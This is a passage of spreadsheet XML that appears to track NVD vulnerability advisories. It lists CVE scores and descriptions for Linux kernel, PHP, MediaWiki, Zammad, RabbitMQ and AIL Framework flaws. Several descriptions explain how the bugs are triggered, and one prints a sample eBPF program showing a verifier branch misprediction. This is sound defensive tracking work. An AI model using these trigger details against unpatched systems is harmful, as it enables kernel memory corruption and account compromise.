          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98027</t>
        </is>
      </c>
    </row>
    <row r="218">
      <c r="A218" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B218" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C218" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98029</t>
        </is>
      </c>
      <c r="D218" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E218" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F218" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G218" s="5" t="inlineStr"/>
      <c r="H218" s="5" t="inlineStr"/>
      <c r="I218" s="5" t="inlineStr"/>
      <c r="J218" s="5" t="inlineStr"/>
      <c r="K218" s="5" t="inlineStr"/>
      <c r="L218" s="5" t="inlineStr"/>
      <c r="M218" s="5" t="inlineStr"/>
      <c r="N218" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O218" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P218" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q218" s="5" t="inlineStr"/>
      <c r="R218" s="5" t="inlineStr"/>
      <c r="S218" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
eth: nfp: bound the ntuple rule dump by the caller's buffer size
nfp_net_get_fs_loc() dumps every entry of nn-&gt;fs.list into rule_locs[]
without consulting cmd-&gt;rule_cnt, which is how many entries the caller
had room for.  ETHTOOL_GRXCLSRLALL requires no CAP_NET_ADMIN and the
ioctl sizes the buffer from the rule_cnt userspace passes in, so once an
admin has installed flow steering rules any user can ask for fewer slots
than there are rules and run off the end of the allocation.  A rule_cnt
of 0 leaves the buffer pointer NULL and the walk dereferences it.
Bail out with -EMSGSIZE when the buffer fills up, the way the other
ntuple capable drivers do, and report how many locations were filled so
a shrinking rule list does not leave the caller reading stale slots.</t>
        </is>
      </c>
      <c r="T218" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98029</t>
        </is>
      </c>
    </row>
    <row r="219">
      <c r="A219" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B219" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C219" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98030</t>
        </is>
      </c>
      <c r="D219" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E219" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F219" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G219" s="5" t="inlineStr"/>
      <c r="H219" s="5" t="inlineStr"/>
      <c r="I219" s="5" t="inlineStr"/>
      <c r="J219" s="5" t="inlineStr"/>
      <c r="K219" s="5" t="inlineStr"/>
      <c r="L219" s="5" t="inlineStr"/>
      <c r="M219" s="5" t="inlineStr"/>
      <c r="N219" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O219" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P219" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q219" s="5" t="inlineStr"/>
      <c r="R219" s="5" t="inlineStr"/>
      <c r="S219" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: dsa: bcm_sf2: bound the CFP rule dump by the caller's buffer size
bcm_sf2_cfp_rule_get_all() walks the whole cfp.unique bitmap into
rule_locs[] without consulting nfc-&gt;rule_cnt, which is how many entries
the caller had room for.  ETHTOOL_GRXCLSRLALL requires no CAP_NET_ADMIN
and the ioctl sizes the buffer from the rule_cnt userspace passes in, so
once an admin has installed CFP rules any user can ask for fewer slots
than there are rules and run off the end of the allocation.  A rule_cnt
of 0 leaves the buffer pointer NULL and the walk dereferences it.</t>
        </is>
      </c>
      <c r="T219" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98030</t>
        </is>
      </c>
    </row>
    <row r="220">
      <c r="A220" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B220" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C220" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98041</t>
        </is>
      </c>
      <c r="D220" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E220" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F220" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G220" s="5" t="inlineStr"/>
      <c r="H220" s="5" t="inlineStr"/>
      <c r="I220" s="5" t="inlineStr"/>
      <c r="J220" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K220" s="5" t="inlineStr"/>
      <c r="L220" s="5" t="inlineStr"/>
      <c r="M220" s="5" t="inlineStr"/>
      <c r="N220" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O220" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P220" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q220" s="5" t="inlineStr"/>
      <c r="R220" s="5" t="inlineStr"/>
      <c r="S220" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Don't predict JMP32 pointer vs zero comparisons
Consider the following program:
        r1 = map_value;      /* low 32 bits are zero at runtime */
        r6 = 0xdead000000000000;
        if w1 != 0 goto l1;
    l0: r1 += r6;
        r2 = *(u64 *)(r1 + 0);
        exit;
    l1: r6 = 0;
        goto l0;
At the moment is_branch_taken() reports the jump as always taken,
because it does not distinguish between BPF_JMP and BPF_JMP32
comparisons when processing 'if w1 != 0 ...'.</t>
        </is>
      </c>
      <c r="T220" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98041</t>
        </is>
      </c>
    </row>
    <row r="221">
      <c r="A221" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B221" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C221" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98083</t>
        </is>
      </c>
      <c r="D221" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E221" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F221" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G221" s="5" t="inlineStr"/>
      <c r="H221" s="5" t="inlineStr"/>
      <c r="I221" s="5" t="inlineStr"/>
      <c r="J221" s="5" t="inlineStr"/>
      <c r="K221" s="5" t="inlineStr"/>
      <c r="L221" s="5" t="inlineStr"/>
      <c r="M221" s="5" t="inlineStr"/>
      <c r="N221" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O221" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P221" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q221" s="5" t="inlineStr"/>
      <c r="R221" s="5" t="inlineStr"/>
      <c r="S221" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
btrfs: fix transaction use-after-free in raid stripe insertion
If allocation of a RAID stripe extent fails,
btrfs_insert_one_raid_extent() aborts and ends the transaction before
returning -ENOMEM.
btrfs_finish_one_ordered(), the production caller through
btrfs_insert_raid_extent(), still owns the transaction handle. It handles
the error by aborting the transaction and then reaches the common exit
path, which ends the transaction again.
The premature end can free the handle and drop its transaction reference.
Transaction cleanup can then free the transaction before the caller's
second abort accesses the handle and transaction, resulting in
use-after-free.
Keep the abort at the failure site, but let the caller's common exit path
end the transaction once, after it has finished using both objects.</t>
        </is>
      </c>
      <c r="T221" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98083</t>
        </is>
      </c>
    </row>
    <row r="222">
      <c r="A222" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B222" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C222" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98150</t>
        </is>
      </c>
      <c r="D222" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E222" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F222" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G222" s="5" t="inlineStr"/>
      <c r="H222" s="5" t="inlineStr"/>
      <c r="I222" s="5" t="inlineStr"/>
      <c r="J222" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K222" s="5" t="inlineStr"/>
      <c r="L222" s="5" t="inlineStr"/>
      <c r="M222" s="5" t="inlineStr"/>
      <c r="N222" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O222" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P222" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q222" s="5" t="inlineStr"/>
      <c r="R222" s="5" t="inlineStr"/>
      <c r="S222" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix BPF_F_CPU validation for sparse CPU IDs
BPF_F_CPU stores the target CPU ID in the upper 32 bits of the map
operation flags. bpf_map_check_op_flags() currently compares that ID
with num_possible_cpus(), which is the number of possible CPUs rather
than a bound on CPU IDs.
On an arm64 QEMU guest with a CPU device-tree hole, the possible CPU
mask was 0,2-3. A userspace program using raw bpf() syscalls creates
a BPF_MAP_TYPE_PERCPU_ARRAY and performs update and lookup operations
for each CPU by setting BPF_F_CPU and the CPU ID in the flags.
With the old check, CPU 1 is incorrectly accepted while valid CPU 3 is
rejected with -ERANGE. The CPU 1 update then reaches the per-CPU map
access path and triggers:
  Unable to handle kernel paging request at virtual address ...
  pc : __pi_memcpy_generic+0x5c/0x22c
  lr : bpf_percpu_array_update+0x2dc/0x2e8
  Call trace:
    __pi_memcpy_generic
    bpf_map_update_value
    map_update_elem
    __sys_bpf
Check the CPU ID against nr_cpu_ids and cpu_possible() instead. This
rejects CPU IDs outside the valid range and CPUs absent from the
possible mask, while allowing valid sparse CPU IDs.</t>
        </is>
      </c>
      <c r="T222" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98150</t>
        </is>
      </c>
    </row>
    <row r="223">
      <c r="A223" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B223" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C223" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98154</t>
        </is>
      </c>
      <c r="D223" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E223" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F223" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G223" s="5" t="inlineStr"/>
      <c r="H223" s="5" t="inlineStr"/>
      <c r="I223" s="5" t="inlineStr"/>
      <c r="J223" s="5" t="inlineStr"/>
      <c r="K223" s="5" t="inlineStr"/>
      <c r="L223" s="5" t="inlineStr"/>
      <c r="M223" s="5" t="inlineStr"/>
      <c r="N223" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O223" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P223" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q223" s="5" t="inlineStr"/>
      <c r="R223" s="5" t="inlineStr"/>
      <c r="S223" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvme-rdma: fix -EIO cleanup order in queue_rq
On -EIO, the RDMA queue_rq path reports a host path error and then
still cleans up the command and unmaps the SQE DMA. The path error
helper completes the request, so that is double cleanup and DMA unmap
after the request is already complete.
Unmap the SQE first, then report the host path error. Skip the outer
command cleanup on that path.</t>
        </is>
      </c>
      <c r="T223" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98154</t>
        </is>
      </c>
    </row>
    <row r="224">
      <c r="A224" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B224" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C224" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100187</t>
        </is>
      </c>
      <c r="D224" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E224" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F224" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G224" s="5" t="inlineStr"/>
      <c r="H224" s="5" t="inlineStr"/>
      <c r="I224" s="5" t="inlineStr"/>
      <c r="J224" s="5" t="inlineStr"/>
      <c r="K224" s="5" t="inlineStr"/>
      <c r="L224" s="5" t="inlineStr"/>
      <c r="M224" s="5" t="inlineStr"/>
      <c r="N224" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O224" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P224" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q224" s="5" t="inlineStr"/>
      <c r="R224" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S224" s="5" t="inlineStr">
        <is>
          <t>The Onion module in AIL Framework contained a performance shortcut in its URL extraction logic that accepted URLs as valid .onion targets based solely on a length check (exactly 69 characters) and a suffix check (ending in ".onion"), without performing proper hostname parsing or onion-domain validation. An unauthenticated attacker who could publish or control web content crawled by the framework could embed a crafted URL containing an IP address or non-onion hostname with a path ending in ".onion" that satisfied the length and suffix conditions. Such a URL would be extracted, its domain naively sliced from the string, and queued as a legitimate onion crawler task. This allowed unauthenticated content publishers to inject arbitrary non-onion targets into the crawler's task queue, influencing crawler behavior and potentially directing it toward unintended network resources. The vulnerability required no authentication, no user interaction, and only the ability to place crafted content in a location the framework would crawl. The security impact is a loss of integrity in the crawler's target selection: the framework processes and acts upon URLs that do not correspond to legitimate .onion services.</t>
        </is>
      </c>
      <c r="T224" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100187</t>
        </is>
      </c>
    </row>
    <row r="225">
      <c r="A225" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B225" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C225" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100377</t>
        </is>
      </c>
      <c r="D225" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E225" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F225" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G225" s="5" t="inlineStr"/>
      <c r="H225" s="5" t="inlineStr"/>
      <c r="I225" s="5" t="inlineStr"/>
      <c r="J225" s="5" t="inlineStr"/>
      <c r="K225" s="5" t="inlineStr"/>
      <c r="L225" s="5" t="inlineStr"/>
      <c r="M225" s="5" t="inlineStr"/>
      <c r="N225" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O225" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P225" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q225" s="5" t="inlineStr"/>
      <c r="R225" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S225" s="5" t="inlineStr">
        <is>
          <t>Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Wikimedia Foundation Mediawiki - WikiLambda Extension allows Excavation.
This issue affects Mediawiki - WikiLambda Extension: 1.47.0-alpha. The issue has been remediated on the `master` branch.</t>
        </is>
      </c>
      <c r="T225" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100377</t>
        </is>
      </c>
    </row>
    <row r="226">
      <c r="A226" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B226" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C226" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17545</t>
        </is>
      </c>
      <c r="D226" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E226" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F226" s="5" t="inlineStr">
        <is>
          <t>security@php.net</t>
        </is>
      </c>
      <c r="G226" s="5" t="inlineStr"/>
      <c r="H226" s="5" t="inlineStr"/>
      <c r="I226" s="5" t="inlineStr"/>
      <c r="J226" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K226" s="5" t="inlineStr"/>
      <c r="L226" s="5" t="inlineStr"/>
      <c r="M226" s="5" t="inlineStr"/>
      <c r="N226" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O226" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P226" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q226" s="5" t="inlineStr"/>
      <c r="R226" s="5" t="inlineStr">
        <is>
          <t>CWE-67</t>
        </is>
      </c>
      <c r="S226" s="5" t="inlineStr">
        <is>
          <t>On Windows, PHP's filesystem and stream APIs do not reject reserved device names such as CON, PRN, AUX, NUL, COM1 to COM9, LPT1 to LPT9, CONIN$ and CONOUT$ when they appear as a component of a path. An attacker-controlled filename therefore reaches CreateFileW() and opens a device instead of the regular file the application expected, which can block or hang the request and exhaust worker processes.</t>
        </is>
      </c>
      <c r="T226" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17545</t>
        </is>
      </c>
    </row>
    <row r="227">
      <c r="A227" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B227" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C227" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63207</t>
        </is>
      </c>
      <c r="D227" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E227" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F227" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G227" s="5" t="inlineStr"/>
      <c r="H227" s="5" t="inlineStr"/>
      <c r="I227" s="5" t="inlineStr"/>
      <c r="J227" s="5" t="inlineStr"/>
      <c r="K227" s="5" t="inlineStr"/>
      <c r="L227" s="5" t="inlineStr"/>
      <c r="M227" s="5" t="inlineStr"/>
      <c r="N227" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O227" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P227" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q227" s="5" t="inlineStr"/>
      <c r="R227" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-312, CWE-522</t>
        </is>
      </c>
      <c r="S227" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. In 7.0.3 and 7.1.1, an authenticated administrator can obtain stored integration credentials in cleartext through the integration administration API. Certain responses do not consistently mask sensitive fields, so configured secrets can be returned in plain text instead of the expected masked placeholder. Both the LDAP and Exchange integrations are affected. This issue is fixed in version 7.1.2.</t>
        </is>
      </c>
      <c r="T227" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63207</t>
        </is>
      </c>
    </row>
    <row r="228">
      <c r="A228" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B228" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C228" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67226</t>
        </is>
      </c>
      <c r="D228" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E228" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F228" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G228" s="5" t="inlineStr"/>
      <c r="H228" s="5" t="inlineStr"/>
      <c r="I228" s="5" t="inlineStr"/>
      <c r="J228" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K228" s="5" t="inlineStr"/>
      <c r="L228" s="5" t="inlineStr"/>
      <c r="M228" s="5" t="inlineStr"/>
      <c r="N228" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O228" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P228" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q228" s="5" t="inlineStr"/>
      <c r="R228" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S228" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.0.0 until 4.0.22 and 4.1.14 and 4.2.7, Admin-only atom exhaustion: PUT /api/users tags list. settags/2 maps rabbitdatacoercion:toatom/1 over the user's tags list. The 20 MB management body limit fits ~3-4M short tag strings. An administrator can crash the node in a single request by creating a user (or importing definitions) with ~1M unique tag administrator. This issue is fixed in versions 4.0.22 and 4.1.14 and 4.2.7.</t>
        </is>
      </c>
      <c r="T228" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67226</t>
        </is>
      </c>
    </row>
    <row r="229">
      <c r="A229" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B229" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C229" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84461</t>
        </is>
      </c>
      <c r="D229" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E229" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F229" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G229" s="5" t="inlineStr"/>
      <c r="H229" s="5" t="inlineStr"/>
      <c r="I229" s="5" t="inlineStr"/>
      <c r="J229" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K229" s="5" t="inlineStr"/>
      <c r="L229" s="5" t="inlineStr"/>
      <c r="M229" s="5" t="inlineStr"/>
      <c r="N229" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O229" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P229" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q229" s="5" t="inlineStr"/>
      <c r="R229" s="5" t="inlineStr">
        <is>
          <t>CWE-203, CWE-307, CWE-799</t>
        </is>
      </c>
      <c r="S229" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.1.2, the two-factor login step let an attacker try unlimited password guesses for any account without triggering Zammad's normal lockout or rate limiting. The response also revealed whether a guess was correct, even before two-factor authentication was checked. This made it possible to brute-force weak or reused passwords. This issue is fixed in version 7.1.2.</t>
        </is>
      </c>
      <c r="T229" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84461</t>
        </is>
      </c>
    </row>
    <row r="230">
      <c r="A230" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B230" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C230" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96875</t>
        </is>
      </c>
      <c r="D230" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E230" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F230" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G230" s="5" t="inlineStr"/>
      <c r="H230" s="5" t="inlineStr"/>
      <c r="I230" s="5" t="inlineStr"/>
      <c r="J230" s="5" t="inlineStr">
        <is>
          <t>go, cargo</t>
        </is>
      </c>
      <c r="K230" s="5" t="inlineStr"/>
      <c r="L230" s="5" t="inlineStr"/>
      <c r="M230" s="5" t="inlineStr"/>
      <c r="N230" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O230" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P230" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q230" s="5" t="inlineStr"/>
      <c r="R230" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S230" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Mediawiki - Cargo extension allows Stored XSS.
This issue affects Mediawiki - Cargo extension: through 3.9.4.</t>
        </is>
      </c>
      <c r="T230" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96875</t>
        </is>
      </c>
    </row>
    <row r="231">
      <c r="A231" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B231" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C231" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96876</t>
        </is>
      </c>
      <c r="D231" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E231" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F231" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G231" s="5" t="inlineStr"/>
      <c r="H231" s="5" t="inlineStr"/>
      <c r="I231" s="5" t="inlineStr"/>
      <c r="J231" s="5" t="inlineStr">
        <is>
          <t>go, cargo</t>
        </is>
      </c>
      <c r="K231" s="5" t="inlineStr"/>
      <c r="L231" s="5" t="inlineStr"/>
      <c r="M231" s="5" t="inlineStr"/>
      <c r="N231" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O231" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P231" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q231" s="5" t="inlineStr"/>
      <c r="R231" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S231" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Mediawiki - Cargo extension allows Reflected XSS.
This issue affects Mediawiki - Cargo extension: through 3.9.4.</t>
        </is>
      </c>
      <c r="T231" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96876</t>
        </is>
      </c>
    </row>
    <row r="232">
      <c r="A232" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B232" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C232" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96877</t>
        </is>
      </c>
      <c r="D232" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E232" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F232" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G232" s="5" t="inlineStr"/>
      <c r="H232" s="5" t="inlineStr"/>
      <c r="I232" s="5" t="inlineStr"/>
      <c r="J232" s="5" t="inlineStr">
        <is>
          <t>go, cargo</t>
        </is>
      </c>
      <c r="K232" s="5" t="inlineStr"/>
